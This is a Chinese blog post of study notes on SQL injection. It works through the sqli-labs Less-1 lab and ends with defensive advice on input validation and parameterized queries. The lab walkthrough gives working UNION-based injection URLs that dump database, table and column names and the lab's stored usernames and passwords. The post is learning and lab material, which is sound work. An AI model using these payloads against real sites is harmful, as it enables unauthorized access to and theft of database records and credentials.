sql注入学习笔记(一)

最新推荐文章于 2025-07-28 15:51:45 发布
最新推荐文章于 2025-07-28 15:51:45 发布
阅读量794 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/w17691058648x/article/details/88387179
本文介绍了SQL注入的基本概念,展示了如何通过注入SQL语句欺骗服务器执行恶意操作,包括判断交互方法、数据类型、构造闭合等步骤,并提供了一个实际的SQL注入攻击示例。同时,文章还讨论了SQL注入产生的原因,如不当的类型处理、不安全的数据库配置等,并提出了相应的防护措施,如输入验证、避免动态SQL拼接、使用独立权限的数据库连接等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入:将sql语句注入进web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

                  具体来说就是讲sql语句注入进后台数据库中,从而达到盗取数据库数据的目的。

URL:同一资源定位符

http://  192.168.246.130/sqli-labs-master/Less-1/

协议    IP地址或域名        访问的文件夹

SQL注入的产生原因通常表现在以下几方面:

  • 不当的类型处理;
  • 不安全的数据库配置;
  • 不合理的查询集处理;
  • 不当的错误处理;
  • 转义字符处理不合适;
  • 多个提交处理不当。

sql注入常用步骤:

  1. 判断交互方法,判断浏览器提交数据和web服务器的交互方式。两种方法:get提交和post提交

    get提交:提交数据会在URL中显示

    post提交:提交数据不会再URL中显示

  2. 判断所提交变量的数据类型。整型和字符型。

    id=1 and 1=2   //让提交的数据为假,有交互显示的为整型,无交互显示的为字符型。

    若无交互显示,则需要进一步判断闭合方式。

  3. 构造闭合(整型不需要)  常见的闭合方法'',"",(''),("")等。

  4. 在闭合中构造sql语句并判断数据表的行数

  5. 在有显示的航输入需要回显的sql语句。

  6. 爆库名、表名、列名、数据

Sql注入实例:

  1. 判断交互方法

2、判断提交的变量类型     整型或字符型

3、构造闭合 

此处的闭合方法为  ’    需要将单引号注释掉、注释符号为--+

4、在闭合中构造sql语句并判断数据库的行数

http://192.168.246.130/sqli-labs-master/Less-1/?id=-1%27%20union%20all%20select%201,2,3%20--+

此处行数为3行

5、在有显示的行输入需要回显的sql语句

http://192.168.246.130/sqli-labs-master/Less-1/?id=-1%27%20union%20all%20select%201,2,database()%20--+

此处数据库名为security

 

  1. 爆表名、列名、数据

表名:emails,referers,uagents,users

http://192.168.246.130/sqli-labs-master/Less-1/?id=-1%27%20union%20all%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27%20--+

列名:id,username,password

http://192.168.246.130/sqli-labs-master/Less-1/?id=-1%27%20union%20all%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27%20and%20table_schema%20=%20%27security%27%20--+

数据:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

http://192.168.246.130/sqli-labs-master/Less-1/?id=-1%27%20union%20all%20select%201,group_concat(username),group_concat(password)%20from%20users%20--+

SQL注入防护:

  • 永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双引号进行转换等。

  • 永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。

  • 永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。

  • 不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。

  • 应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装

  • sql注入的检测方法一般采取辅助软件或网站平台来检测,软件一般采用sql注入检测工具jsky。

 

SQL注入基础学习(笔记)
部分学习记录
07-29 756
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了个单引号,推测输入内容为单引号引起来的字
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 697
目录sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
sql注入学习
qq_45590470的博客
09-09 2637
sql注入
干货|SQL注入思路总结(非常详细)零基础入门到精通,收藏这篇就够了
2301_79455190的博客
07-06 851
SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入。网络安全产业就像个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
渗透常用SQL注入语句合集
weixin_34015566的博客
12-20 382
1.判断有无注入点; and 1=1 and 1=2 2.猜表般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面...
sql注入学习笔记
XiaoXiao_RenHe的专栏
03-12 396
sql注入如何判断数字型、字符型注入点,是否可以cookie传参,判断字段数。
CTF-Web学习笔记SQL注入
最新发布
Deng7326的博客
07-28 1073
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
sql注入笔记
03-15
SQL 注入笔记 SQL 注入种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入SQL ...
SQL注入(自学笔记)
woqusss的博客
08-10 467
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,些本人见过的查询语句闭合方式。...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 679
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入段漂亮的代码片生成个适合你的列表创建个表格设定内容居中、居左、居右SmartyPants创建个自定义列表如何创建个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入学习
Elvira
08-27 1375
什么是sql注入 系统函数 全局函数 information_schema
SQL注入的学习
大鹏展翅
06-21 1618
SQL注入,XML注入,代码注入,CRLF注入 SQL注入主要有两个关键条件: 1、用户能够控制输入 2、原本程序要执行的代码,拼接了用户的输入的数据 主要有盲注,timing attack 盲注值得是在服务器没有回显时完成注入攻击。 timingattack 是根据返回时间的长短来判断注入是否成功。 自动化注入工具 sqlmap  采用的是
学习sql注入
weixin_43328516的博客
02-03 297
、使用PHP study、sqllibs搭建注入环境 首先要下载好相应的PHP study和sqllibs,然后将压缩包解压至PHP 修改inc里面的数据库用户名和密码,因为sqli-libs默认用户名为root,默认密码为空, 所以将db-creds.inc中的密码改为root 在浏览器中输入http://127.0.0.1/sqli-labs-master/!!出现下面这个界面点击set u...
SQL注入学习
qq_53143214的博客
02-27 4713
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 学习目的: 能找到注入点 能判断数据库是什么类型 能绕过各种过滤 SQL注入 平台层注入 原因:数据库平台漏洞或数据库配置不安全 代码层注入 原因:程序员对输入未进行细致地过滤,从而执行了非法的数据查询 SQL注入漏洞的方法 数字注入 字符串注入 SQL注入方法有很多种, 按数据类型可以分为
简单的SQL注入学习
weixin_30386713的博客
02-07 147
引贴: http://blog.163.com/lucia_gagaga/blog/static/26476801920168184648754/ 首先需要编写个php页面,讲php页面放入/opt/lampp/htdocs目录下: 解释下这个页面: 1.通过if语句判断变量是否初始化 2.if语句中通过mysql_connect()函数连接数据库 3.连接数据库成功后,选择...
sql注入学习笔记
m0_52341820的博客
04-14 414
、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等个select语句中的列名,默认选取不同值,允许重复值用union all ...
SQL注入学习笔记
星落
11-04 1310
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
VC++结合SQL编程的学习笔记精华
学习笔记可能包括了如何在VC++程序中安全地处理用户输入,防止SQL注入攻击,以及如何在SQL中管理用户权限和角色等安全策略。 描述中重复强调的“VC++ SQL 学习笔记”表示该文档是学习VC++与SQL结合使用时的些心得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值